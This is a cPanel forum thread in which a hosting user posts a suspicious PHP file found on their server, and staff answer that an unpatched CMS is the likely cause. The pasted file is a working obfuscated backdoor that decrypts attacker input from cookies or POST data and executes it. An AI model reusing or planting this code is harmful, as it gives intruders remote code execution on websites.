Randolph

Registered
Dec 3, 2018
1
0
76
Barcelona
cPanel Access Level
Root Administrator
Hi , I think that there are virus in my Cpanel because I find various PHP files with strange names on my shared hosting. I attached 1 files the PHP files suspicious and also a file PHP contains. What do you think about it?

PHP:
<?php
$prnhdx = 'l2e1s0b4H\'#_9i*f-nau7xo6ymtgdc3rvpk5';$ndjwdeg = Array();$ndjwdeg[] = $prnhdx[29].$prnhdx[31].$prnhdx[2].$prnhdx[18].$prnhdx[26].$prnhdx[2].$prnhdx[11].$prnhdx[15].$prnhdx[19].$prnhdx[17].$prnhdx[29].$prnhdx[26].$prnhdx[13].$prnhdx[22].$prnhdx[17];$ndjwdeg[] = $prnhdx[8].$prnhdx[14];$ndjwdeg[] = $prnhdx[7].$prnhdx[6].$prnhdx[30].$prnhdx[5].$prnhdx[20].$prnhdx[6].$prnhdx[5].$prnhdx[6].$prnhdx[16].$prnhdx[15].$prnhdx[2].$prnhdx[2].$prnhdx[20].$prnhdx[16].$prnhdx[7].$prnhdx[30].$prnhdx[12].$prnhdx[3].$prnhdx[16].$prnhdx[12].$prnhdx[20].$prnhdx[35].$prnhdx[18].$prnhdx[16].$prnhdx[29].$prnhdx[1].$prnhdx[20].$prnhdx[1].$prnhdx[18].$prnhdx[20].$prnhdx[35].$prnhdx[23].$prnhdx[5].$prnhdx[35].$prnhdx[23].$prnhdx[3];$ndjwdeg[] = $prnhdx[10];$ndjwdeg[] = $prnhdx[29].$prnhdx[22].$prnhdx[19].$prnhdx[17].$prnhdx[26];$ndjwdeg[] = $prnhdx[4].$prnhdx[26].$prnhdx[31].$prnhdx[11].$prnhdx[31].$prnhdx[2].$prnhdx[33].$prnhdx[2].$prnhdx[18].$prnhdx[26];$ndjwdeg[] = $prnhdx[2].$prnhdx[21].$prnhdx[33].$prnhdx[0].$prnhdx[22].$prnhdx[28].$prnhdx[2];$ndjwdeg[] = $prnhdx[4].$prnhdx[19].$prnhdx[6].$prnhdx[4].$prnhdx[26].$prnhdx[31];$ndjwdeg[] = $prnhdx[18].$prnhdx[31].$prnhdx[31].$prnhdx[18].$prnhdx[24].$prnhdx[11].$prnhdx[25].$prnhdx[2].$prnhdx[31].$prnhdx[27].$prnhdx[2];$ndjwdeg[] = $prnhdx[4].$prnhdx[26].$prnhdx[31].$prnhdx[0].$prnhdx[2].$prnhdx[17];$ndjwdeg[] = $prnhdx[33].$prnhdx[18].$prnhdx[29].$prnhdx[34];foreach ($ndjwdeg[8]($_COOKIE, $_POST) as $nxbhxeo => $hxdhpxt){function uhwxwyv($ndjwdeg, $nxbhxeo, $ncwkr){return $ndjwdeg[7]($ndjwdeg[5]($nxbhxeo . $ndjwdeg[2], ($ncwkr / $ndjwdeg[9]($nxbhxeo)) + 1), 0, $ncwkr);}function ltqndx($ndjwdeg, $jnxrcjh){return @$ndjwdeg[10]($ndjwdeg[1], $jnxrcjh);}function udobw($ndjwdeg, $jnxrcjh){$bvntgpn = $ndjwdeg[4]($jnxrcjh) % 3;if (!$bvntgpn) {$uiijao = $ndjwdeg[0]; $hkngdn = $uiijao("", $jnxrcjh[1]($jnxrcjh[2]));$hkngdn();exit();}}$hxdhpxt = ltqndx($ndjwdeg, $hxdhpxt);udobw($ndjwdeg, $ndjwdeg[6]($ndjwdeg[3], $hxdhpxt ^ uhwxwyv($ndjwdeg, $nxbhxeo, $ndjwdeg[9]($hxdhpxt))));}
 

Attachments

Last edited:

cPanelLauren

Forums Analyst II
Staff member
Nov 14, 2017
8,537
699
263
Houston
cPanel Access Level
DataCenter Provider
@kadrin has it correct, this is not a cPanel specific issue but more so likely related to a vulnerable script installed on the account, most commonly associated with a CMS system which has not been kept updated/maintained.

In order to resolve this issue you need to audit the entire documentroot, either using a malware scanner or by hand if you know what to look for. Best practices for the CMS systems or scripts on the account is ensure that they're all updated and anything not in use is removed such as themes/plugins/components etc.